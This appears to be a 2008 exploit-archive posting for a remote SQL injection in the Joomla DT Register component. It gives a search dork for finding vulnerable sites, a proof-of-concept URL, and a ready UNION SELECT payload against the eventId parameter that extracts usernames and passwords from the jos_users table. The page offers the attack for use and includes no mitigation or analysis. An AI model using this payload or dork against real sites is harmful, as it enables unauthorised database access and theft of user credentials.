Home / exploitsPDF  

joomladtr-sql.txt

Posted on 17 July 2008

/---------------------------------------------------------------\n / / Joomla Component DT Register Remote SQL injection \n / ---------------------------------------------------------------/ [*] Author : His0k4 [ALGERIAN HaCkeR] [*] Dork : inurl:com_DTRegister eventId [*] Vendor : http://www.dthdevelopment.com/components/dt-register.html [*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL} [*] Example : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138 [*] Greetings : All friends & muslims HaCkeRs www.dz-secure.com ----------------------------------------------------------------------------

 

TOP